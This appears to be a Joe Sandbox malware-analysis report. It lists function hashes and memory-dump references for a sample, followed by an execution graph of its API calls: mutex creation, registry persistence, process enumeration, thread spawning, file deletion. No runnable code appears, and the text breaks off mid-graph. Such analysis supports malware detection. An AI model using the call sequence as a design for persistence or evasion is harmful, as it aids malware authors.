                                                                                                                                                • Opcode ID: dd282edbcf263eb8de8a823b5366f40934d8bf8200ebbe9a5be01d0b50c1b3ce
                                                                                                                                                • Instruction ID: 5740214d2fb5cc98834099e8fc08c9d21f5a9405809e78bea6ed3605fd944ae0
                                                                                                                                                • Opcode Fuzzy Hash: dd282edbcf263eb8de8a823b5366f40934d8bf8200ebbe9a5be01d0b50c1b3ce
                                                                                                                                                • Instruction Fuzzy Hash: 75E11C74E042598FDB14DFA9C5809AEFBF2FF88304F248169D418AB356D771A941CFA1
                                                                                                                                                Function 059B62F8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 26a552c3cd9ef06a5634118814154f1bd8a2d2e705256439cd36544fc97b2038
                                                                                                                                                • Instruction ID: 476ec2abfbe87094e84d6ef2c26274258eea64b2e2c41596485e9d1c4b99aa3b
                                                                                                                                                • Opcode Fuzzy Hash: 26a552c3cd9ef06a5634118814154f1bd8a2d2e705256439cd36544fc97b2038
                                                                                                                                                • Instruction Fuzzy Hash: 72E11A74E042198FDB14DFA9C5809AEFBF2FF89304F248169E415AB35ADB70A941CF61
                                                                                                                                                Function 00F8D63C Relevance: .3, Instructions: 264COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1986723074.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_f80000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3588b7875829f2a2481af361e5a195172123a4a974913cb3e6066ecb65e904f3
                                                                                                                                                • Instruction ID: 256ce14167942f44aa5e47ae9a1a2e208fc54eed3446b267d8e4838093d47147
                                                                                                                                                • Opcode Fuzzy Hash: 3588b7875829f2a2481af361e5a195172123a4a974913cb3e6066ecb65e904f3
                                                                                                                                                • Instruction Fuzzy Hash: 04A18D36E002098FCF19EFB4C8405DEB7B6FF84310B25857AE802AB265DB75E959DB40
                                                                                                                                                Function 059B47E7 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 77d027f6d270065868b24f0f56521754c57ce6b7df01b2619875aceb35cbc701
                                                                                                                                                • Instruction ID: a6d472165f7d2264c09c96ccc5a1c4a1fa9916bc71297d5044a9dc406364a627
                                                                                                                                                • Opcode Fuzzy Hash: 77d027f6d270065868b24f0f56521754c57ce6b7df01b2619875aceb35cbc701
                                                                                                                                                • Instruction Fuzzy Hash: 5B514E75E042598FDB14CFA9C9815AEFBF2FF89304F2481AAD408A7316D7719942CFA1
                                                                                                                                                Function 059B7418 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 53e62e9127e522fb533c0b8549676d75c330fdd75836f8f2f40a3f866d85347d
                                                                                                                                                • Instruction ID: 51fd6354fbd867b0e52c214761ad46e308bac01f6e3b1624ab3a48ab770a3c9b
                                                                                                                                                • Opcode Fuzzy Hash: 53e62e9127e522fb533c0b8549676d75c330fdd75836f8f2f40a3f866d85347d
                                                                                                                                                • Instruction Fuzzy Hash: F6512D75E042198FDB14CFA9C5805AEBBF2FF89304F24C669D418AB316D7719A41CFA1
                                                                                                                                                Function 059B6720 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c65c2eaf736161268db9c2f3cbc62df7caed8f50cac787d42f2019924ef89b32
                                                                                                                                                • Instruction ID: d63848c5ac68491f6669383e9ced7c4fd3cd8315129ffa96f60d683ce813b335
                                                                                                                                                • Opcode Fuzzy Hash: c65c2eaf736161268db9c2f3cbc62df7caed8f50cac787d42f2019924ef89b32
                                                                                                                                                • Instruction Fuzzy Hash: EE510975E042198FDB14CFA9C6805AEFBF2FF89304F248169D418AB316D735A942CFA1
                                                                                                                                                Function 059B5EB2 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 15355fd0ade92147b86d0f52b3718bbc422daa81afdbfd36eca87a2ab207598d
                                                                                                                                                • Instruction ID: 416db8d2df83fc968e0672e1317242cb623e2453a47d709af9ed7cf8ba884177
                                                                                                                                                • Opcode Fuzzy Hash: 15355fd0ade92147b86d0f52b3718bbc422daa81afdbfd36eca87a2ab207598d
                                                                                                                                                • Instruction Fuzzy Hash: EC51E7B5E042198FDB14DFAAC5805AEFBF2BF89304F24C169D418AB316D771A941CFA1
                                                                                                                                                Function 059B62E8 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1994736372.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_59b0000_LdSbZG1iH6.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b9a0bcdb4e84a6ac05b5e49cddb5d2efdec34ad3be520fa4270a3dc4c8bd2b51
                                                                                                                                                • Instruction ID: 28f91b33714b396d76cafec55585bc0f271aec822d198d6a65290969ce405190
                                                                                                                                                • Opcode Fuzzy Hash: b9a0bcdb4e84a6ac05b5e49cddb5d2efdec34ad3be520fa4270a3dc4c8bd2b51
                                                                                                                                                • Instruction Fuzzy Hash: 97512970E052198FDB14CFA9C6805AEFBF2FF89304F248169D418AB316D770A941CFA1

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.8%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:13%
                                                                                                                                                Total number of Nodes:843
                                                                                                                                                Total number of Limit Nodes:32
                                                                                                                                                execution_graph 46466 404e26 WaitForSingleObject 46467 404e40 SetEvent CloseHandle 46466->46467 46468 404e57 closesocket 46466->46468 46469 404ed8 46467->46469 46470 404e64 46468->46470 46471 404e7a 46470->46471 46479 4050e4 83 API calls 46470->46479 46473 404e8c WaitForSingleObject 46471->46473 46474 404ece SetEvent CloseHandle 46471->46474 46480 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46473->46480 46474->46469 46476 404e9b SetEvent WaitForSingleObject 46481 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46476->46481 46478 404eb3 SetEvent CloseHandle CloseHandle 46478->46474 46479->46471 46480->46476 46481->46478 46482 434918 46483 434924 ___FrameUnwindToState 46482->46483 46508 434627 46483->46508 46485 43492b 46487 434954 46485->46487 46802 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46485->46802 46492 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46487->46492 46803 4442d2 5 API calls CatchGuardHandler 46487->46803 46489 43496d 46491 434973 ___FrameUnwindToState 46489->46491 46804 444276 5 API calls CatchGuardHandler 46489->46804 46493 4349f3 46492->46493 46805 443487 35 API calls 5 library calls 46492->46805 46519 434ba5 46493->46519 46503 434a1f 46505 434a28 46503->46505 46806 443462 28 API calls _Atexit 46503->46806 46807 43479e 13 API calls 2 library calls 46505->46807 46509 434630 46508->46509 46808 434cb6 IsProcessorFeaturePresent 46509->46808 46511 43463c 46809 438fb1 10 API calls 4 library calls 46511->46809 46513 434641 46514 434645 46513->46514 46810 44415f 46513->46810 46514->46485 46517 43465c 46517->46485 46826 436f10 46519->46826 46522 4349f9 46523 444223 46522->46523 46828 44f0d9 46523->46828 46525 44422c 46526 434a02 46525->46526 46832 446895 35 API calls 46525->46832 46528 40ea00 46526->46528 46834 41cbe1 LoadLibraryA GetProcAddress 46528->46834 46530 40ea1c GetModuleFileNameW 46839 40f3fe 46530->46839 46532 40ea38 46854 4020f6 46532->46854 46535 4020f6 28 API calls 46536 40ea56 46535->46536 46860 41beac 46536->46860 46540 40ea68 46886 401e8d 46540->46886 46542 40ea71 46543 40ea84 46542->46543 46544 40eace 46542->46544 47053 40fbee 95 API calls 46543->47053 46892 401e65 46544->46892 46547 40eade 46551 401e65 22 API calls 46547->46551 46548 40ea96 46549 401e65 22 API calls 46548->46549 46550 40eaa2 46549->46550 47054 410f72 36 API calls __EH_prolog 46550->47054 46552 40eafd 46551->46552 46897 40531e 46552->46897 46555 40eab4 47055 40fb9f 77 API calls 46555->47055 46556 40eb0c 46902 406383 46556->46902 46559 40eabd 47056 40f3eb 70 API calls 46559->47056 46564 40eac6 46567 401fd8 11 API calls 46564->46567 46569 40ef36 46567->46569 46568 401fd8 11 API calls 46570 40eb36 46568->46570 46797 443396 GetModuleHandleW 46569->46797 46571 401e65 22 API calls 46570->46571 46572 40eb3f 46571->46572 46919 401fc0 46572->46919 46574 40eb4a 46575 401e65 22 API calls 46574->46575 46576 40eb63 46575->46576 46577 401e65 22 API calls 46576->46577 46578 40eb7e 46577->46578 46579 40ebe9 46578->46579 47057 406c59 28 API calls 46578->47057 46580 401e65 22 API calls 46579->46580 46585 40ebf6 46580->46585 46582 40ebab 46583 401fe2 28 API calls 46582->46583 46584 40ebb7 46583->46584 46586 401fd8 11 API calls 46584->46586 46602 40ec3d 46585->46602 46923 413584 RegOpenKeyExA 46585->46923 46587 40ebc0 46586->46587 46591 413584 3 API calls 46587->46591 46589 40ec43 46589->46564 46929 41b354 46589->46929 46593 40ebdf 46591->46593 46593->46579 46596 40f38a 46593->46596 46594 40ec5e 46597 40ecb1 46594->46597 46946 407751 46594->46946 46595 40ec21 46595->46602 47058 4139e4 30 API calls 46595->47058 47101 4139e4 30 API calls 46596->47101 46600 401e65 22 API calls 46597->46600 46604 40ecba 46600->46604 46926 40d0a4 46602->46926 46603 40f3a0 47102 4124b0 65 API calls ___scrt_fastfail 46603->47102 46612 40ecc6 46604->46612 46613 40eccb 46604->46613 46607 40ec87 46610 401e65 22 API calls 46607->46610 46608 40ec7d 47059 407773 30 API calls 46608->47059 46622 40ec90 46610->46622 46611 40f388 46615 41bcef 28 API calls 46611->46615 47062 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46612->47062 46618 401e65 22 API calls 46613->46618 46614 40ec82 47060 40729b 97 API calls 46614->47060 46619 40f3ba 46615->46619 46620 40ecd4 46618->46620 47103 413a5e RegOpenKeyExW RegDeleteValueW 46619->47103 46950 41bcef 46620->46950 46622->46597 46626 40ecac 46622->46626 46623 40ecdf 46954 401f13 46623->46954 47061 40729b 97 API calls 46626->47061 46627 40f3cd 46630 401f09 11 API calls 46627->46630 46632 40f3d7 46630->46632 46634 401f09 11 API calls 46632->46634 46635 40f3e0 46634->46635 47104 40dd7d 27 API calls 46635->47104 46636 401e65 22 API calls 46638 40ecfc 46636->46638 46641 401e65 22 API calls 46638->46641 46639 40f3e5 47105 414f65 167 API calls 46639->47105 46643 40ed16 46641->46643 46644 401e65 22 API calls 46643->46644 46645 40ed30 46644->46645 46646 401e65 22 API calls 46645->46646 46647 40ed49 46646->46647 46648 40edb6 46647->46648 46650 401e65 22 API calls 46647->46650 46649 40edc5 46648->46649 46656 40ef41 ___scrt_fastfail 46648->46656 46651 40edce 46649->46651 46679 40ee4a ___scrt_fastfail 46649->46679 46654 40ed5e _wcslen 46650->46654 46652 401e65 22 API calls 46651->46652 46653 40edd7 46652->46653 46655 401e65 22 API calls 46653->46655 46654->46648 46657 401e65 22 API calls 46654->46657 46658 40ede9 46655->46658 47065 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 46656->47065 46659 40ed79 46657->46659 46661 401e65 22 API calls 46658->46661 46662 401e65 22 API calls 46659->46662 46663 40edfb 46661->46663 46664 40ed8e 46662->46664 46666 401e65 22 API calls 46663->46666 47063 40da6f 31 API calls 46664->47063 46665 40ef8c 46667 401e65 22 API calls 46665->46667 46668 40ee24 46666->46668 46669 40efb1 46667->46669 46673 401e65 22 API calls 46668->46673 47066 402093 46669->47066 46671 40eda1 46672 401f13 28 API calls 46671->46672 46675 40edad 46672->46675 46677 40ee35 46673->46677 46676 401f09 11 API calls 46675->46676 46676->46648 47064 40ce34 45 API calls _wcslen 46677->47064 46678 40efc3 47072 4137aa RegCreateKeyA 46678->47072 46966 413982 46679->46966 46683 40eede ctype 46688 401e65 22 API calls 46683->46688 46684 40ee45 46684->46679 46686 401e65 22 API calls 46687 40efe5 46686->46687 47078 43bb2c 39 API calls _swprintf 46687->47078 46692 40eef5 46688->46692 46690 40eff2 46693 40f01f 46690->46693 47079 41ce2c 86 API calls ___scrt_fastfail 46690->47079 46692->46665 46694 401e65 22 API calls 46692->46694 46698 402093 28 API calls 46693->46698 46696 40ef12 46694->46696 46699 41bcef 28 API calls 46696->46699 46697 40f003 CreateThread 46697->46693 47433 41d4ee 10 API calls 46697->47433 46700 40f034 46698->46700 46701 40ef1e 46699->46701 46703 402093 28 API calls 46700->46703 46976 40f4af GetModuleFileNameW 46701->46976 46704 40f043 46703->46704 47080 41b580 79 API calls 46704->47080 46707 40f048 46708 401e65 22 API calls 46707->46708 46709 40f054 46708->46709 46710 401e65 22 API calls 46709->46710 46711 40f066 46710->46711 46712 401e65 22 API calls 46711->46712 46713 40f086 46712->46713 47081 43bb2c 39 API calls _swprintf 46713->47081 46715 40f093 46716 401e65 22 API calls 46715->46716 46717 40f09e 46716->46717 46718 401e65 22 API calls 46717->46718 46719 40f0af 46718->46719 46720 401e65 22 API calls 46719->46720 46721 40f0c4 46720->46721 46722 401e65 22 API calls 46721->46722 46723 40f0d5 46722->46723 46724 40f0dc StrToIntA 46723->46724 47082 409e1f 169 API calls _wcslen 46724->47082 46726 40f0ee 46727 401e65 22 API calls 46726->46727 46728 40f0f7 46727->46728 46729 40f13c 46728->46729 47083 43455e 46728->47083 46731 401e65 22 API calls 46729->46731 46736 40f14c 46731->46736 46733 401e65 22 API calls 46734 40f11f 46733->46734 46737 40f126 CreateThread 46734->46737 46735 40f194 46739 401e65 22 API calls 46735->46739 46736->46735 46738 43455e new 22 API calls 46736->46738 46737->46729 47430 41a045 102 API calls __EH_prolog 46737->47430 46740 40f161 46738->46740 46744 40f19d 46739->46744 46741 401e65 22 API calls 46740->46741 46742 40f173 46741->46742 46747 40f17a CreateThread 46742->46747 46743 40f207 46745 401e65 22 API calls 46743->46745 46744->46743 46746 401e65 22 API calls 46744->46746 46750 40f210 46745->46750 46748 40f1b9 46746->46748 46747->46735 47434 41a045 102 API calls __EH_prolog 46747->47434 46751 401e65 22 API calls 46748->46751 46749 40f255 47093 41b69e 79 API calls 46749->47093 46750->46749 46753 401e65 22 API calls 46750->46753 46754 40f1ce 46751->46754 46756 40f225 46753->46756 47090 40da23 31 API calls 46754->47090 46755 40f25e 46757 401f13 28 API calls 46755->46757 46761 401e65 22 API calls 46756->46761 46758 40f269 46757->46758 46760 401f09 11 API calls 46758->46760 46763 40f272 CreateThread 46760->46763 46764 40f23a 46761->46764 46762 40f1e1 46765 401f13 28 API calls 46762->46765 46768 40f293 CreateThread 46763->46768 46769 40f29f 46763->46769 47435 40f7e2 120 API calls 46763->47435 47091 43bb2c 39 API calls _swprintf 46764->47091 46767 40f1ed 46765->46767 46770 401f09 11 API calls 46767->46770 46768->46769 47429 412132 144 API calls 46768->47429 46771 40f2b4 46769->46771 46772 40f2a8 CreateThread 46769->46772 46774 40f1f6 CreateThread 46770->46774 46776 40f307 46771->46776 46778 402093 28 API calls 46771->46778 46772->46771 47431 412716 38 API calls ___scrt_fastfail 46772->47431 46774->46743 47432 401be9 49 API calls 46774->47432 46775 40f247 47092 40c19d 7 API calls 46775->47092 47095 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 46776->47095 46779 40f2d7 46778->46779 47094 4052fd 28 API calls 46779->47094 46783 40f31f 46783->46635 46785 41bcef 28 API calls 46783->46785 46787 40f338 46785->46787 47096 413656 RegOpenKeyExW 46787->47096 46793 401f09 11 API calls 46795 40f359 46793->46795 46794 40f381 DeleteFileW 46794->46611 46794->46795 46795->46611 46795->46794 46796 40f36f Sleep 46795->46796 46796->46795 46798 434a15 46797->46798 46798->46503 46799 4434bf 46798->46799 47437 44323c 46799->47437 46802->46485 46803->46489 46804->46492 46805->46493 46806->46505 46807->46491 46808->46511 46809->46513 46814 44fbe8 46810->46814 46813 438fda 8 API calls 3 library calls 46813->46514 46817 44fc01 46814->46817 46816 43464e 46816->46517 46816->46813 46818 43502b 46817->46818 46819 435036 IsProcessorFeaturePresent 46818->46819 46820 435034 46818->46820 46822 435078 46819->46822 46820->46816 46825 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46822->46825 46824 43515b 46824->46816 46825->46824 46827 434bb8 GetStartupInfoW 46826->46827 46827->46522 46829 44f0eb 46828->46829 46830 44f0e2 46828->46830 46829->46525 46833 44efd8 48 API calls 5 library calls 46830->46833 46832->46525 46833->46829 46835 41cc20 LoadLibraryA GetProcAddress 46834->46835 46836 41cc10 GetModuleHandleA GetProcAddress 46834->46836 46837 41cc49 44 API calls 46835->46837 46838 41cc39 LoadLibraryA GetProcAddress 46835->46838 46836->46835 46837->46530 46838->46837 47106 41b539 FindResourceA 46839->47106 46843 40f428 ctype 47116 4020b7 46843->47116 46846 401fe2 28 API calls 46847 40f44e 46846->46847 46848 401fd8 11 API calls 46847->46848 46849 40f457 46848->46849 46850 43bda0 _Yarn 21 API calls 46849->46850 46851 40f468 ctype 46850->46851 47122 406e13 46851->47122 46853 40f49b 46853->46532 46855 40210c 46854->46855 46856 4023ce 11 API calls 46855->46856 46857 402126 46856->46857 46858 402569 28 API calls 46857->46858 46859 402134 46858->46859 46859->46535 47186 4020df 46860->47186 46862 41bebf 46866 41bf31 46862->46866 46874 401fe2 28 API calls 46862->46874 46877 401fd8 11 API calls 46862->46877 46881 41bf2f 46862->46881 47190 4041a2 28 API calls 46862->47190 47191 41cec5 46862->47191 46863 401fd8 11 API calls 46864 41bf61 46863->46864 46865 401fd8 11 API calls 46864->46865 46867 41bf69 46865->46867 47202 4041a2 28 API calls 46866->47202 46870 401fd8 11 API calls 46867->46870 46872 40ea5f 46870->46872 46871 41bf3d 46873 401fe2 28 API calls 46871->46873 46882 40fb52 46872->46882 46875 41bf46 46873->46875 46874->46862 46876 401fd8 11 API calls 46875->46876 46878 41bf4e 46876->46878 46877->46862 46879 41cec5 28 API calls 46878->46879 46879->46881 46881->46863 46883 40fb5e 46882->46883 46885 40fb65 46882->46885 47228 402163 11 API calls 46883->47228 46885->46540 46887 402163 46886->46887 46888 40219f 46887->46888 47229 402730 11 API calls 46887->47229 46888->46542 46890 402184 47230 402712 11 API calls std::_Deallocate 46890->47230 46893 401e6d 46892->46893 46894 401e75 46893->46894 47231 402158 22 API calls 46893->47231 46894->46547 46898 4020df 11 API calls 46897->46898 46899 40532a 46898->46899 47232 4032a0 46899->47232 46901 405346 46901->46556 47236 4051ef 46902->47236 46904 406391 47240 402055 46904->47240 46907 401fe2 46908 401ff1 46907->46908 46915 402039 46907->46915 46909 4023ce 11 API calls 46908->46909 46910 401ffa 46909->46910 46911 40203c 46910->46911 46912 402015 46910->46912 46913 40267a 11 API calls 46911->46913 47255 403098 28 API calls 46912->47255 46913->46915 46916 401fd8 46915->46916 46917 4023ce 11 API calls 46916->46917 46918 401fe1 46917->46918 46918->46568 46920 401fd2 46919->46920 46921 401fc9 46919->46921 46920->46574 47256 4025e0 28 API calls 46921->47256 46924 4135db 46923->46924 46925 4135ae RegQueryValueExA RegCloseKey 46923->46925 46924->46595 46925->46924 47257 401fab 46926->47257 46928 40d0ae CreateMutexA GetLastError 46928->46589 47258 41c048 46929->47258 46934 401fe2 28 API calls 46935 41b390 46934->46935 46936 401fd8 11 API calls 46935->46936 46937 41b398 46936->46937 46938 4135e1 31 API calls 46937->46938 46940 41b3ee 46937->46940 46939 41b3c1 46938->46939 46941 41b3cc StrToIntA 46939->46941 46940->46594 46942 41b3e3 46941->46942 46943 41b3da 46941->46943 46945 401fd8 11 API calls 46942->46945 47266 41cffa 22 API calls 46943->47266 46945->46940 46947 407765 46946->46947 46948 413584 3 API calls 46947->46948 46949 40776c 46948->46949 46949->46607 46949->46608 46951 41bd03 46950->46951 47267 40b93f 46951->47267 46953 41bd0b 46953->46623 46955 401f22 46954->46955 46956 401f6a 46954->46956 46957 402252 11 API calls 46955->46957 46963 401f09 46956->46963 46958 401f2b 46957->46958 46959 401f6d 46958->46959 46960 401f46 46958->46960 47300 402336 11 API calls 46959->47300 47299 40305c 28 API calls 46960->47299 46964 402252 11 API calls 46963->46964 46965 401f12 46964->46965 46965->46636 46967 4139a0 46966->46967 46968 406e13 28 API calls 46967->46968 46969 4139b5 46968->46969 46970 4020f6 28 API calls 46969->46970 46971 4139c5 46970->46971 46972 4137aa 14 API calls 46971->46972 46973 4139cf 46972->46973 46974 401fd8 11 API calls 46973->46974 46975 4139dc 46974->46975 46975->46683 46977 40f4e0 46976->46977 46978 40f669 46977->46978 47301 401f86 46977->47301 47320 41b71b 46978->47320 46983 40f586 Process32NextW 46985 40f59d CloseHandle 46983->46985 47001 40f518 46983->47001 46984 401f13 28 API calls 46986 40f67f 46984->46986 46988 40f5b2 46985->46988 46989 401f09 11 API calls 46986->46989 46991 40f5be 46988->46991 47030 40f660 46988->47030 46990 40f688 46989->46990 46994 40f6a3 CloseHandle 46990->46994 47028 40f611 46990->47028 46993 401f09 11 API calls 46991->46993 46992 401f09 11 API calls 46992->46978 46995 40f5c3 46993->46995 46996 4020df 11 API calls 46994->46996 46995->46994 46998 40f6b8 46996->46998 46997 401f09 11 API calls 46999 40ef23 46997->46999 47343 41c516 CreateFileW 46998->47343 46999->46564 46999->46665 47002 40f5c8 47001->47002 47003 401f09 11 API calls 47001->47003 47305 40417e 47001->47305 47311 41c26e OpenProcess 47002->47311 47003->46983 47004 40f6cd 47351 4185a3 47004->47351 47008 401f13 28 API calls 47009 40f5e2 47008->47009 47011 401f09 11 API calls 47009->47011 47010 40f6ed 47013 40f7a2 47010->47013 47014 40417e 28 API calls 47010->47014 47012 40f5eb 47011->47012 47018 40f5ff 47012->47018 47026 40f616 47012->47026 47354 4138b2 RegCreateKeyA 47013->47354 47015 40f707 47014->47015 47359 409196 28 API calls 47015->47359 47017 40f797 47021 401fd8 11 API calls 47017->47021 47020 401f09 11 API calls 47018->47020 47023 40f608 47020->47023 47021->47028 47022 40f724 47031 4185a3 31 API calls 47022->47031 47024 401f09 11 API calls 47023->47024 47024->47028 47025 40f657 47027 401f09 11 API calls 47025->47027 47026->47025 47357 41c076 OpenProcess 47026->47357 47027->47030 47028->46997 47030->46992 47033 40f735 47031->47033 47032 40f634 47032->47025 47034 40f638 47032->47034 47035 401f09 11 API calls 47033->47035 47358 40b9a7 28 API calls 47034->47358 47042 40f742 47035->47042 47037 40f649 47038 401f09 11 API calls 47037->47038 47040 40f652 47038->47040 47039 40f799 47041 401f09 11 API calls 47039->47041 47040->46985 47041->47013 47042->47039 47360 409196 28 API calls 47042->47360 47044 40f765 47045 4185a3 31 API calls 47044->47045 47046 40f776 47045->47046 47047 401f09 11 API calls 47046->47047 47048 40f783 47047->47048 47048->47039 47049 40f789 47048->47049 47050 40d0a4 2 API calls 47049->47050 47051 40f78e 47050->47051 47052 401f09 11 API calls 47051->47052 47052->47017 47053->46548 47054->46555 47055->46559 47057->46582 47058->46602 47059->46614 47060->46607 47061->46597 47062->46613 47063->46671 47064->46684 47065->46665 47067 40209b 47066->47067 47068 4023ce 11 API calls 47067->47068 47069 4020a6 47068->47069 47421 4024ed 47069->47421 47073 4137fa 47072->47073 47074 4137c3 47072->47074 47075 401fd8 11 API calls 47073->47075 47077 4137d5 RegSetValueExA RegCloseKey 47074->47077 47076 40efd9 47075->47076 47076->46686 47077->47073 47078->46690 47079->46697 47080->46707 47081->46715 47082->46726 47085 434563 47083->47085 47084 43bda0 _Yarn 21 API calls 47084->47085 47085->47084 47086 40f10c 47085->47086 47425 443001 7 API calls 2 library calls 47085->47425 47426 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47085->47426 47427 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47085->47427 47086->46733 47090->46762 47091->46775 47092->46749 47093->46755 47095->46783 47097 413682 RegQueryValueExW RegCloseKey 47096->47097 47098 4136af 47096->47098 47097->47098 47099 40417e 28 API calls 47098->47099 47100 40f34e 47099->47100 47100->46793 47101->46603 47103->46627 47104->46639 47428 41ada8 104 API calls 47105->47428 47107 41b556 LoadResource LockResource SizeofResource 47106->47107 47108 40f419 47106->47108 47107->47108 47109 43bda0 47108->47109 47114 4461b8 ___crtLCMapStringA 47109->47114 47110 4461f6 47126 44062d 20 API calls _Atexit 47110->47126 47112 4461e1 RtlAllocateHeap 47113 4461f4 47112->47113 47112->47114 47113->46843 47114->47110 47114->47112 47125 443001 7 API calls 2 library calls 47114->47125 47117 4020bf 47116->47117 47127 4023ce 47117->47127 47119 4020ca 47131 40250a 47119->47131 47121 4020d9 47121->46846 47123 4020b7 28 API calls 47122->47123 47124 406e27 47123->47124 47124->46853 47125->47114 47126->47113 47128 4023d8 47127->47128 47129 402428 47127->47129 47128->47129 47138 4027a7 47128->47138 47129->47119 47132 40251a 47131->47132 47133 402535 47132->47133 47135 402520 47132->47135 47159 4028e8 47133->47159 47149 402569 47135->47149 47137 402533 47137->47121 47139 402e21 47138->47139 47142 4016b4 47139->47142 47141 402e30 47141->47129 47143 4016cb 47142->47143 47144 4016c6 47142->47144 47143->47144 47145 4016f3 47143->47145 47148 43bd68 11 API calls _Atexit 47144->47148 47145->47141 47147 43bd67 47148->47147 47170 402888 47149->47170 47151 40257d 47152 402592 47151->47152 47153 4025a7 47151->47153 47175 402a34 22 API calls 47152->47175 47155 4028e8 28 API calls 47153->47155 47158 4025a5 47155->47158 47156 40259b 47176 4029da 22 API calls 47156->47176 47158->47137 47160 4028f1 47159->47160 47161 402953 47160->47161 47162 4028fb 47160->47162 47184 4028a4 22 API calls 47161->47184 47165 402904 47162->47165 47167 402917 47162->47167 47178 402cae 47165->47178 47168 402915 47167->47168 47169 4023ce 11 API calls 47167->47169 47168->47137 47169->47168 47171 402890 47170->47171 47172 402898 47171->47172 47177 402ca3 22 API calls 47171->47177 47172->47151 47175->47156 47176->47158 47179 402cb8 __EH_prolog 47178->47179 47185 402e54 22 API calls 47179->47185 47181 4023ce 11 API calls 47183 402d92 47181->47183 47182 402d24 47182->47181 47183->47168 47185->47182 47187 4020e7 47186->47187 47188 4023ce 11 API calls 47187->47188 47189 4020f2 47188->47189 47189->46862 47190->46862 47192 41ced2 47191->47192 47193 41cf31 47192->47193 47197 41cee2 47192->47197 47194 41cf4b 47193->47194 47195 41d071 28 API calls 47193->47195 47212 41d1d7 28 API calls 47194->47212 47195->47194 47198 41cf1a 47197->47198 47203 41d071 47197->47203 47211 41d1d7 28 API calls 47198->47211 47199 41cf2d 47199->46862 47202->46871 47205 41d079 47203->47205 47204 41d0ab 47204->47198 47205->47204 47206 41d0af 47205->47206 47209 41d093 47205->47209 47223 402725 22 API calls 47206->47223 47213 41d0e2 47209->47213 47211->47199 47212->47199 47214 41d0ec __EH_prolog 47213->47214 47224 402717 22 API calls 47214->47224 47216 41d0ff 47225 41d1ee 11 API calls 47216->47225 47218 